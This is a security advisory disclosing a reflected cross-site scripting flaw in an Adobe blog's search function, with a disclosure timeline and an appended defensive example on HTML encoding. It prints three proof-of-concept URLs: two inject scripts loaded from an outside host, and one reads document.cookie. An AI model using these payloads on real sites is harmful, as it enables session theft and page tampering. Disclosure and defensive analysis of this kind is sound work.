Praetorian503

Adobe Experience Cross Site Scripting


Adobe Experience suffers from a reflected cross site scripting vulnerability. The author contacted Adobe back in August, but the issue is still not resolved, so they are releasing details in hopes that Adobe will address the issue. Note that this finding houses site-specific data.

----------------------------------------------------------------------------------------------------
Title : Adobe Experience Delivers reflected Cross-site Scripting (XSS) vulnerability

Vendor : Adobe Systems Incorporated (http://www.adobe.com)

Description : experiencedelivers.adobe.com is vulnerable to reflected Cross-site Scripting attacks

Advisory time-line:
----------------------------------------------------------------------------------------------------
- Vendor PSIRT notified : 05-Aug-2012
- Vendor response : 05-Aug-2012. Ticket created. "Looking into it now".
- Status requests : 09-Sep-2012, 01-Nov-2012, 08-Nov-2012, 13-Nov-2012, 31-Dec-2012

Adobe PSIRT has not responded to any requests after 09-Nov-2012

- Packet Storm advisory : 19-Jan-2013

Test environment
----------------------------------------------------------------------------------------------------
- Latest Firefox browser


Details
----------------------------------------------------------------------------------------------------
Affected functionality: search function

Test #1: Remote JavaScript execution: display browser cookie
http://experiencedelivers.adobe.com/cemblog/en/experiencedelivers.html?query=%22%3E%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fidash.net%2Fxs.js%3E%3C%2FSCRIPT%3E&blog=search&_charset_=UTF-8

Test #2, Remote JavaScript execution: overwrite HTML content - PoC
http://experiencedelivers.adobe.com/cemblog/en/experiencedelivers.html?query=%22%3E%3Cscript+src%3Dhttp%3A%2F%2Fidash.net%2Fae00.js%3E%3C%2Fscript%3E&blog=search&_charset_=UTF-8

Test #3, Alert test with image-tag
http://experiencedelivers.adobe.com/cemblog/en/experiencedelivers.html?query=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.cookie%29%3E&blog=search&_charset_=UTF-8

Note: the JavaScript test cases are not malicious.

Researcher
----------------------------------------------------------------------------------------------------
Janne Ahlberg
Twitter: https://twitter.com/JanneFI
Blog: http://janne.is
Project site: http://idash.net
----------------------------------------------------------------------------------------------------

Source: PacketStorm
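
Added example, not part of the original advisory or of Adobe's code: the three test cases' query values all start with `">`, which closes a double-quoted attribute and its tag. The sketch below assumes the search term is reflected into an input's value attribute (the advisory does not show the page markup; the template and function names are hypothetical) and compares raw reflection with HTML-encoding at output.

```javascript
// Added example. Template and helper names are hypothetical; the advisory
// does not show the affected page's markup.

// Query strings from the advisory's three test cases.
const TESTS = [
  "query=%22%3E%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fidash.net%2Fxs.js%3E%3C%2FSCRIPT%3E&blog=search&_charset_=UTF-8",
  "query=%22%3E%3Cscript+src%3Dhttp%3A%2F%2Fidash.net%2Fae00.js%3E%3C%2Fscript%3E&blog=search&_charset_=UTF-8",
  "query=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.cookie%29%3E&blog=search&_charset_=UTF-8",
];

// Form-decode the parameter as the server would ('+' is a space).
function decodeQuery(qs) {
  return new URLSearchParams(qs).get("query");
}

// Vulnerable pattern (assumed): raw value placed in a quoted attribute.
function renderRaw(q) {
  return `<input type="text" name="query" value="${q}">`;
}

// Encode the characters that are significant in HTML text and attributes.
function encodeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Corrected pattern: encode at the point of output.
function renderEncoded(q) {
  return `<input type="text" name="query" value="${encodeHtml(q)}">`;
}

// Names of the opening tags a parser would see in the fragment (rough check).
function tagNames(html) {
  return [...html.matchAll(/<([a-zA-Z][a-zA-Z0-9]*)\b[^>]*>/g)].map((m) => m[1].toLowerCase());
}

for (const qs of TESTS) {
  const q = decodeQuery(qs);
  console.log(JSON.stringify(q));
  console.log("  raw:    ", tagNames(renderRaw(q)).join(", "));
  console.log("  encoded:", tagNames(renderEncoded(q)).join(", "));
}
```

With raw reflection each test value adds a second element (script or img) after the input; with encoding the fragment contains only the input and the search term stays inside the attribute value.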